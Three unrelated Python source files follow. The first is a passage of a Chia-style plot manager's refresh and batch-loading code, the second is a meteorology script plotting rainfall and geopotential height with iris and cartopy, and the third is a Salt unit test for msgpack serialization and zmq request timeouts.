plot_paths += paths
total_result: PlotRefreshResult = PlotRefreshResult()
total_size = len(plot_paths)
self._refresh_callback(PlotRefreshEvents.started, PlotRefreshResult(remaining=total_size))
# First drop all plots we have in plot_filename_paths but which are no longer in the filesystem or set in the config
for path in list(self.failed_to_open_filenames.keys()):
if path not in plot_paths:
del self.failed_to_open_filenames[path]
for path in self.no_key_filenames.copy():
if path not in plot_paths:
self.no_key_filenames.remove(path)
filenames_to_remove: List[str] = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
loaded_path, duplicated_paths = paths_entry
loaded_plot = Path(loaded_path) / Path(plot_filename)
if loaded_plot not in plot_paths:
filenames_to_remove.append(plot_filename)
with self:
if loaded_plot in self.plots:
del self.plots[loaded_plot]
total_result.removed.append(loaded_plot)
# No need to check the duplicates here since we drop the whole entry
continue
paths_to_remove: List[str] = []
for path in duplicated_paths:
loaded_plot = Path(path) / Path(plot_filename)
if loaded_plot not in plot_paths:
paths_to_remove.append(path)
total_result.removed.append(loaded_plot)
for path in paths_to_remove:
duplicated_paths.remove(path)
for filename in filenames_to_remove:
del self.plot_filename_paths[filename]
for remaining, batch in list_to_batches(plot_paths, self.refresh_parameter.batch_size):
batch_result: PlotRefreshResult = self.refresh_batch(batch, plot_directories)
if not self._refreshing_enabled:
self.log.debug("refresh_plots: Aborted")
break
# Set the remaining files since `refresh_batch()` doesn't know them but we want to report it
batch_result.remaining = remaining
total_result.loaded += batch_result.loaded
total_result.processed += batch_result.processed
total_result.duration += batch_result.duration
self._refresh_callback(PlotRefreshEvents.batch_processed, batch_result)
if remaining == 0:
break
batch_sleep = self.refresh_parameter.batch_sleep_milliseconds
self.log.debug(f"refresh_plots: Sleep {batch_sleep} milliseconds")
time.sleep(float(batch_sleep) / 1000.0)
if self._refreshing_enabled:
self._refresh_callback(PlotRefreshEvents.done, total_result)
# Cleanup unused cache
available_ids = set([plot_info.prover.get_id() for plot_info in self.plots.values()])
invalid_cache_keys = [plot_id for plot_id in self.cache.keys() if plot_id not in available_ids]
self.cache.remove(invalid_cache_keys)
self.log.debug(f"_refresh_task: cached entries removed: {len(invalid_cache_keys)}")
if self.cache.changed():
self.cache.save()
self.last_refresh_time = time.time()
self.log.debug(
f"_refresh_task: total_result.loaded {len(total_result.loaded)}, "
f"total_result.removed {len(total_result.removed)}, "
f"total_duration {total_result.duration:.2f} seconds"
)
except Exception as e:
log.error(f"_refresh_callback raised: {e} with the traceback: {traceback.format_exc()}")
self.reset()
def refresh_batch(self, plot_paths: List[Path], plot_directories: Set[Path]) -> PlotRefreshResult:
start_time: float = time.time()
result: PlotRefreshResult = PlotRefreshResult(processed=len(plot_paths))
counter_lock = threading.Lock()
log.debug(f"refresh_batch: {len(plot_paths)} files in directories {plot_directories}")
if self.match_str is not None:
log.info(f'Only loading plots that contain "{self.match_str}" in the file or directory name')
def process_file(file_path: Path) -> Optional[PlotInfo]:
if not self._refreshing_enabled:
return None
filename_str = str(file_path)
if self.match_str is not None and self.match_str not in filename_str:
return None
if (
file_path in self.failed_to_open_filenames
and (time.time() - self.failed_to_open_filenames[file_path])
< self.refresh_parameter.retry_invalid_seconds
):
# Try once every `refresh_parameter.retry_invalid_seconds` seconds to open the file
return None
if file_path in self.plots:
return self.plots[file_path]
entry: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if entry is not None:
loaded_parent, duplicates = entry
if str(file_path.parent) in duplicates:
log.debug(f"Skip duplicated plot {str(file_path)}")
return None
try:
if not file_path.exists():
return None
prover = DiskProver(str(file_path))
log.debug(f"process_file {str(file_path)}")
expected_size = _expected_plot_size(prover.get_size()) * UI_ACTUAL_SPACE_CONSTANT_FACTOR
stat_info = file_path.stat()
# TODO: consider checking if the file was just written to (which would mean that the file is still
# being copied). A segfault might happen in this edge case.
if prover.get_size() >= 30 and stat_info.st_size < 0.98 * expected_size:
log.warning(
f"Not farming plot {file_path}. Size is {stat_info.st_size / (1024**3)} GiB, but expected"
f" at least: {expected_size / (1024 ** 3)} GiB. We assume the file is being copied."
)
return None
cache_entry = self.cache.get(prover.get_id())
if cache_entry is None:
(
pool_public_key_or_puzzle_hash,
farmer_public_key,
local_master_sk,
) = parse_plot_info(prover.get_memo())
# Only use plots that have the correct keys associated with them
if farmer_public_key not in self.farmer_public_keys:
log.warning(f"Plot {file_path} has a farmer public key that is not in the farmer's pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
pool_public_key: Optional[G1Element] = None
pool_contract_puzzle_hash: Optional[bytes32] = None
if isinstance(pool_public_key_or_puzzle_hash, G1Element):
pool_public_key = pool_public_key_or_puzzle_hash
else:
assert isinstance(pool_public_key_or_puzzle_hash, bytes32)
pool_contract_puzzle_hash = pool_public_key_or_puzzle_hash
if pool_public_key is not None and pool_public_key not in self.pool_public_keys:
log.warning(f"Plot {file_path} has a pool public key that is not in the farmer's pool pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
# If a plot is in `no_key_filenames` the keys were missing in earlier refresh cycles. We can remove
# the current plot from that list if it's in there, since we passed the key checks above.
if file_path in self.no_key_filenames:
self.no_key_filenames.remove(file_path)
local_sk = master_sk_to_local_sk(local_master_sk)
plot_public_key: G1Element = ProofOfSpace.generate_plot_public_key(
local_sk.get_g1(), farmer_public_key, pool_contract_puzzle_hash is not None
)
cache_entry = CacheEntry(pool_public_key, pool_contract_puzzle_hash, plot_public_key)
self.cache.update(prover.get_id(), cache_entry)
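# Remember which directory this plot filename was first loaded from; any other directory containing the same filename is recorded as a duplicate and skipped.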
with self.plot_filename_paths_lock:
paths: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if paths is None:
paths = (str(Path(prover.get_filename()).parent), set())
self.plot_filename_paths[file_path.name] = paths
else:
paths[1].add(str(Path(prover.get_filename()).parent))
log.warning(f"Have multiple copies of the plot {file_path.name} in {[paths[0], *paths[1]]}.")
return None
new_plot_info: PlotInfo = PlotInfo(
prover,
cache_entry.pool_public_key,
cache_entry.pool_contract_puzzle_hash,
cache_entry.plot_public_key,
stat_info.st_size,
stat_info.st_mtime,
)
with counter_lock:
result.loaded.append(new_plot_info)
if file_path in self.failed_to_open_filenames:
del self.failed_to_open_filenames[file_path]
except Exception as e:
tb = traceback.format_exc()
log.error(f"Failed to open file {file_path}. {e} {tb}")
self.failed_to_open_filenames[file_path] = int(time.time())
return None
log.info(f"Found plot {file_path} of size {new_plot_info.prover.get_size()}")
return new_plot_info
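# Load the batch concurrently; entering the manager's context keeps it locked while the results are merged into self.plots.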
with self, ThreadPoolExecutor() as executor:
plots_refreshed: Dict[Path, PlotInfo] = {}
for new_plot in executor.map(process_file, plot_paths):
if new_plot is not None:
plots_refreshed[Path(new_plot.prover.get_filename())] = new_plot
self.plots.update(plots_refreshed)
result.duration = time.time() - start_time
self.log.debug(
f"refresh_batch: loaded {len(result.loaded)}, "
f"removed {len(result.removed)}, processed {result.processed}, "
f"remaining {result.remaining}, batch_size {self.refresh_parameter.batch_size}, "
f"duration: {result.duration:.2f} seconds"
)
return result
|
plot_from_pp_geop_height_aind_Rain_by_day_18Aug.py
|
"""
Load pp files, plot mean rainfall (colour fill) with geopotential
height contours for each experiment, and save the figures.
"""
import os, sys
#%matplotlib inline
#%pylab inline
import matplotlib
matplotlib.use('Agg')
# Must be before importing matplotlib.pyplot or pylab!
from matplotlib import rc
from matplotlib.font_manager import FontProperties
from matplotlib import rcParams
from mpl_toolkits.basemap import Basemap
rc('font', family = 'serif', serif = 'cmr10')
rc('text', usetex=True)
rcParams['text.usetex']=True
rcParams['text.latex.unicode']=True
rcParams['font.family']='serif'
rcParams['font.serif']='cmr10'
import matplotlib.pyplot as plt
#from matplotlib import figure
import matplotlib as mpl
import matplotlib.cm as mpl_cm
import numpy as np
import iris
import iris.coords as coords
import iris.quickplot as qplt
import iris.plot as iplt
import iris.coord_categorisation
import iris.unit as unit
import cartopy.crs as ccrs
import cartopy.io.img_tiles as cimgt
import matplotlib.ticker as mticker
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import datetime
from mpl_toolkits.basemap import cm
import imp
from textwrap import wrap
import re
import iris.analysis.cartography
import math
from dateutil import tz
#import multiprocessing as mp
import gc
import types
import pdb
save_path='/nfs/a90/eepdw/Figures/EMBRACE/'
model_name_convert_title = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/model_name_convert_title.py')
unrotate = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/unrotate_pole.py')
pp_file_contourf = 'rain_mean_by_day'
pp_file_contour ='408'
#plot_diags=['sp_hum']
plot_levels = [925]
#experiment_ids = ['dkmbq', 'dklyu']
experiment_ids = ['djznw', 'djzny', 'djznq', 'djzns', 'dklwu', 'dklzq'] # All minus large 2
#Experiment_ids = ['djzny', 'djznq', 'djzns', 'dkjxq', 'dklyu', 'dkmbq', 'dklwu', 'dklzq', 'dkbhu', 'djznu', 'dkhgu' ] # All 12
#experiment_ids = ['djzny', 'djznq', 'djzns', 'dkjxq', 'dklwu', 'dklzq', 'dkbhu',] # All 12
#experiment_ids = ['dkbhu', 'dkjxq']
experiment_ids = ['dkmbq', 'dklyu', 'djznw', 'djzny', 'djznq', 'djzns', 'dklwu', 'dklzq'] # All minus large 2
min_contour = 0
max_contour = 3
tick_interval=0.3
clevs = np.linspace(min_contour, max_contour,64)
cmap=cm.s3pcpn_l
ticks = (np.arange(min_contour, max_contour+tick_interval,tick_interval))
pp_file_path = '/nfs/a90/eepdw/Data/EMBRACE/'
degs_crop_top = 1.7
degs_crop_bottom = 2.5
from iris.coord_categorisation import add_categorised_coord
# def add_hour_of_day(cube, coord, name='hour'):
# add_categorised_coord(cube, name, coord,
# lambda coord, x: coord.units.num2date(x).hour)
figprops = dict(figsize=(8,8), dpi=100)
#cmap=cm.s3pcpn_l
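# Time unit used to turn the cubes' raw time points into datetimes for the plot titles.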
u = unit.Unit('hours since 1970-01-01 00:00:00',calendar='gregorian')
dx, dy = 10, 10
divisor=10 # for lat/lon rounding
lon_high = 101.866
lon_low = 64.115
lat_high = 33.
lat_low =-6.79
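# Round the plot extent outwards to the nearest 'divisor' degrees so gridline ticks fall on round values.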
lon_low_tick=lon_low -(lon_low%divisor)
lon_high_tick=math.ceil(lon_high/divisor)*divisor
lat_low_tick=lat_low - (lat_low%divisor)
lat_high_tick=math.ceil(lat_high/divisor)*divisor
def main():
for p_level in plot_levels:
# Set pressure height contour min/max
if p_level == 925:
clev_min = 660.
clev_max = 810.
elif p_level == 850:
clev_min = 1435.
clev_max = 1530.
elif p_level == 700:
clev_min = 3090.
clev_max = 3155.
elif p_level == 500:
clev_min = 5800.
clev_max = 5890.
else:
print('Contour min/max not set for this pressure level')
# Set potential temperature min/max
if p_level == 925:
clevpt_min = 300.
clevpt_max = 312.
elif p_level == 850:
clevpt_min = 302.
clevpt_max = 310.
elif p_level == 700:
clevpt_min = 312.
clevpt_max = 320.
elif p_level == 500:
clevpt_min = 325.
clevpt_max = 332.
else:
print('Potential temperature min/max not set for this pressure level')
# Set specific humidity min/max
if p_level == 925:
clevsh_min = 0.012
clevsh_max = 0.020
elif p_level == 850:
clevsh_min = 0.007
clevsh_max = 0.017
elif p_level == 700:
clevsh_min = 0.002
clevsh_max = 0.010
elif p_level == 500:
clevsh_min = 0.001
clevsh_max = 0.005
else:
print('Specific humidity min/max not set for this pressure level')
#clevs_col = np.arange(clev_min, clev_max)
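# Line-contour levels for the geopotential height field, in steps of 5 between the per-level limits chosen above.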
clevs_lin = np.arange(clev_min, clev_max, 5)
p_level_constraint = iris.Constraint(pressure=p_level)
#for plot_diag in plot_diags:
for experiment_id in experiment_ids:
expmin1 = experiment_id[:-1]
pfile = '/nfs/a90/eepdw/Data/EMBRACE/%s/%s/%s.pp' % (expmin1, experiment_id, pp_file_contourf)
#pc = iris(pfile)
pcube_contourf = iris.load_cube(pfile)
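# Convert the mean rain rate to a per-hour amount (assumes the pp field holds a per-second rate, e.g. kg m-2 s-1).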
pcube_contourf=iris.analysis.maths.multiply(pcube_contourf,3600)
height_pp_file = '%s_%s_on_p_levs_mean_by_day.pp' % (experiment_id, pp_file_contour)
height_pfile = '%s%s/%s/%s' % (pp_file_path, expmin1, experiment_id, height_pp_file)
pcube_contour = iris.load_cube(height_pfile, p_level_constraint)
time_coords = pcube_contourf.coord('time')
#Add_hour_of_day(pcube, pcube.coord('time'))
#add_hour_of_day(height_cube, height_cube.coord('time'))
time_coords = pcube_contourf.coord('time')
iris.coord_categorisation.add_day_of_year(pcube_contourf, time_coords, name='day_of_year')
time_coords = pcube_contour.coord('time')
iris.coord_categorisation.add_day_of_year(pcube_contour, time_coords, name='day_of_year')
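# Keep only 18 August (day of year 230 in a non-leap year), the date in the script name.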
pcube_contourf = pcube_contourf.extract(iris.Constraint(day_of_year=230))
#pdb.set_trace()
for t, time_cube in enumerate(pcube_contourf.slices(['grid_latitude', 'grid_longitude'])):
height_cube_slice = pcube_contour.extract(iris.Constraint(day_of_year=time_cube.coord('day_of_year').points))
#pdb.set_trace()
# Get time of averages for plot title
h = u.num2date(np.array(time_cube.coord('time').points, dtype=float)[0]).strftime('%d%b')
#Convert to India time
from_zone = tz.gettz('UTC')
to_zone = tz.gettz('Asia/Kolkata')
h_utc = u.num2date(np.array(time_cube.coord('time').points, dtype=float)[0]).replace(tzinfo=from_zone)
h_local = h_utc.astimezone(to_zone).strftime('%H%M')
fig = plt.figure(**figprops)
#cmap=plt.cm.RdBu_r
ax = plt.axes(projection=ccrs.PlateCarree(), extent=(lon_low,lon_high,lat_low+degs_crop_bottom,lat_high-degs_crop_top))
m = Basemap(llcrnrlon=lon_low, llcrnrlat=lat_low, urcrnrlon=lon_high, urcrnrlat=lat_high, rsphere=6371229)
# #pdb.set_trace()
# lat = pcube_contourf.coord('grid_latitude').points
# lon = pcube_contourf.coord('grid_longitude').points
# cs = cube.coord_system('CoordSystem')
# lons, lats = np.meshgrid(lon, lat)
# lons, lats = iris.analysis.cartography.unrotate_pole\
# (lons,lats, cs.grid_north_pole_longitude, cs.grid_north_pole_latitude)
# x,y = m(lons,lats)
# if plot_diag=='temp':
# min_contour = clevpt_min
# max_contour = clevpt_max
# cb_label='K'
# main_title='8km Explicit model (dklyu) minus 8km parametrised model geopotential height (grey contours), potential temperature (colours),\
# and wind (vectors) %s UTC %s IST' % (h, h_local)
# tick_interval=2
# clev_number=max_contour-min_contour+1
# elif plot_diag=='sp_hum':
# min_contour = clevsh_min
# max_contour = clevsh_max
# cb_label='kg/kg'
# main_title='8km Explicit model (dklyu) minus 8km parametrised model geopotential height (grey contours), specific humidity (colours),\
# and wind (vectors) %s UTC %s IST' % (h, h_local)
# tick_interval=0.002
# clev_number=max_contour-min_contour+0.001
# clevs = np.linspace(min_contour, max_contour, clev_number)
# #clevs = np.linspace(-3, 3, 32)
# cont = plt.contourf(x,y,time_cube.data, clevs, cmap=cmap, extend='both')
cont = iplt.contourf(time_cube, clevs, cmap=cmap, extend='both')
cs_lin = iplt.contour(height_cube_slice, clevs_lin,colors='#262626',linewidths=1.)
plt.clabel(cs_lin, fontsize=14, fmt='%d', color='black')
#del time_cube
#plt.clabel(cont, fmt='%d')
#ax.stock_img()
ax.coastlines(resolution='110m', color='#262626')
gl = ax.gridlines(draw_labels=True,linewidth=0.5, color='#262626', alpha=0.5, linestyle='--')
gl.xlabels_top = False
gl.ylabels_right = False
#gl.xlines = False
dx, dy = 10, 10
gl.xlocator = mticker.FixedLocator(range(int(lon_low_tick),int(lon_high_tick)+dx,dx))
gl.ylocator = mticker.FixedLocator(range(int(lat_low_tick),int(lat_high_tick)+dy,dy))
gl.xformatter = LONGITUDE_FORMATTER
gl.yformatter = LATITUDE_FORMATTER
gl.xlabel_style = {'size': 12, 'color':'#262626'}
#gl.xlabel_style = {'color': '#262626', 'weight': 'bold'}
gl.ylabel_style = {'size': 12, 'color':'#262626'}
# cbar = fig.colorbar(cont, orientation='horizontal', pad=0.05, extend='both')
# cbar.set_label('%s' % cb_label, fontsize=10, color='#262626')
# #cbar.set_label(time_cube.units, fontsize=10, color='#262626')
# cbar.set_ticks(np.arange(min_contour, max_contour+tick_interval,tick_interval))
# ticks = (np.arange(min_contour, max_contour+tick_interval,tick_interval))
# cbar.set_ticklabels(['${%.1f}$' % i for i in ticks])
# cbar.ax.tick_params(labelsize=10, color='#262626')
#main_title='Mean Rainfall for EMBRACE Period -%s UTC (%s IST)' % (h, h_local)
#main_title=time_cube.standard_name.title().replace('_',' ')
#model_info = re.sub(r'[(\']', ' ', model_info)
#model_info = re.sub(r'[\',)]', ' ', model_info)
#print model_info
file_save_name = '%s_%s_and_%s_%s_hPa_and_geop_height_%s' % (experiment_id, pp_file_contour, pp_file_contourf, p_level, h)
save_dir = '%s%s/%s_and_%s' % (save_path, experiment_id, pp_file_contour, pp_file_contourf)
if not os.path.exists(save_dir): os.makedirs(save_dir)
#plt.show()
#fig.savefig('%s/%s_notitle.png' % (save_dir, file_save_name), format='png', bbox_inches='tight')
plt.title('%s UTC' % (h))
fig.savefig('%s/%s_short_title.png' % (save_dir, file_save_name) , format='png', bbox_inches='tight')
#model_info=re.sub('(.{68} )', '\\1\n', str(model_name_convert_title.main(experiment_id)), 0, re.DOTALL)
#plt.title('\n'.join(wrap('%s\n%s' % (main_title, model_info), 1000,replace_whitespace=False)), fontsize=16)
#fig.savefig('%s/%s.png' % (save_dir, file_save_name), format='png', bbox_inches='tight')
fig.clf()
plt.close()
#del time_cube
gc.collect()
if __name__ == '__main__':
main()
#proc=mp.Process(target=worker)
#proc.daemon=True
#proc.start()
#proc.join()
|
test_payload.py
|
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`Pedro Algarvio (pedro@algarvio.me)`
tests.unit.payload_test
~~~~~~~~~~~~~~~~~~~~~~~
'''
# Import Salt libs
from __future__ import absolute_import, print_function, unicode_literals
import time
import errno
import threading
# Import Salt Testing libs
from tests.support.unit import skipIf, TestCase
from tests.support.helpers import MockWraps
from tests.support.mock import NO_MOCK, NO_MOCK_REASON, patch
# Import salt libs
import salt.payload
from salt.utils.odict import OrderedDict
import salt.exceptions
# Import 3rd-party libs
import msgpack
import zmq
from salt.ext import six
import logging
log = logging.getLogger(__name__)
@skipIf(NO_MOCK, NO_MOCK_REASON)
class PayloadTestCase(TestCase):
def assertNoOrderedDict(self, data):
if isinstance(data, OrderedDict):
raise AssertionError(
'Found an ordered dictionary'
)
if isinstance(data, dict):
for value in six.itervalues(data):
self.assertNoOrderedDict(value)
elif isinstance(data, (list, tuple)):
for chunk in data:
self.assertNoOrderedDict(chunk)
def test_list_nested_odicts(self):
with patch('msgpack.version', (0, 1, 13)):
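# Simulate an old msgpack: the patched version plus a forced TypeError on the first dumps call pushes the serializer onto its OrderedDict fallback path.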
msgpack.dumps = MockWraps(
msgpack.dumps, 1, TypeError('ODict TypeError Forced')
)
payload = salt.payload.Serial('msgpack')
idata = {'pillar': [OrderedDict(environment='dev')]}
odata = payload.loads(payload.dumps(idata.copy()))
self.assertNoOrderedDict(odata)
self.assertEqual(idata, odata)
class SREQTestCase(TestCase):
port = 8845 # TODO: dynamically assign a port?
@classmethod
def setUpClass(cls):
'''
Set up the zmq echo server used by the tests in this class
'''
def echo_server():
'''
A server that echos the message sent to it over zmq
Optional "sleep" can be sent to delay response
'''
context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://*:{0}".format(SREQTestCase.port))
payload = salt.payload.Serial('msgpack')
while SREQTestCase.thread_running.is_set():
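# Non-blocking recv so the loop keeps checking thread_running and can exit cleanly at teardown.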
try:
# Wait for next request from client
message = socket.recv(zmq.NOBLOCK)
msg_deserialized = payload.loads(message)
log.info('Echo server received message: %s', msg_deserialized)
if isinstance(msg_deserialized['load'], dict) and msg_deserialized['load'].get('sleep'):
log.info('Test echo server sleeping for %s seconds',
msg_deserialized['load']['sleep'])
time.sleep(msg_deserialized['load']['sleep'])
socket.send(message)
except zmq.ZMQError as exc:
if exc.errno == errno.EAGAIN:
continue
raise
SREQTestCase.thread_running = threading.Event()
SREQTestCase.thread_running.set()
SREQTestCase.echo_server = threading.Thread(target=echo_server)
SREQTestCase.echo_server.start()
@classmethod
def tearDownClass(cls):
'''
Remove echo server
'''
# kill the thread
SREQTestCase.thread_running.clear()
SREQTestCase.echo_server.join()
def get_sreq(self):
return salt.payload.SREQ('tcp://127.0.0.1:{0}'.format(SREQTestCase.port))
def test_send_auto(self):
'''
Test creation, send/recv
'''
sreq = self.get_sreq()
# check default of empty load and enc clear
assert sreq.send_auto({}) == {'enc': 'clear', 'load': {}}
# check that the load always gets passed
assert sreq.send_auto({'load': 'foo'}) == {'load': 'foo', 'enc': 'clear'}
def test_send(self):
sreq = self.get_sreq()
assert sreq.send('clear', 'foo') == {'enc': 'clear', 'load': 'foo'}
@skipIf(True, 'Disabled until we can figure out how to make this more reliable.')
def test_timeout(self):
'''
Test SREQ Timeouts
'''
sreq = self.get_sreq()
# client-side timeout
start = time.time()
# This is a try/except instead of an assertRaises because of a possible
# subtle bug in zmq wherein a timeout=0 actually executes a single poll
# before the timeout is reached.
log.info('Sending tries=0, timeout=0')
try:
sreq.send('clear', 'foo', tries=0, timeout=0)
except salt.exceptions.SaltReqTimeoutError:
pass
assert time.time() - start < 1 # ensure we didn't wait
# server-side timeout
log.info('Sending tries=1, timeout=1')
start = time.time()
with self.assertRaises(salt.exceptions.SaltReqTimeoutError):
sreq.send('clear', {'sleep': 2}, tries=1, timeout=1)
assert time.time() - start >= 1 # ensure we actually tried once (1s)
# server-side timeout with retries
log.info('Sending tries=2, timeout=1')
start = time.time()
with self.assertRaises(salt.exceptions.SaltReqTimeoutError):
sreq.send('clear', {'sleep': 2}, tries=2, timeout=1)
assert time.time() - start >= 2 # ensure we actually tried twice (2s)
# test a regular send afterwards (to make sure sockets aren't in a twist)
log.info('Sending regular send')
assert sreq.send('clear', 'foo') == {'enc': 'clear', 'load': 'foo'}
def test_destroy(self):
'''
Test the __del__ capabilities
'''
sreq = self.get_sreq()
# ensure no exceptions when we go to destroy the sreq, since __del__
# swallows exceptions, we have to call destroy directly
sreq.destroy()
|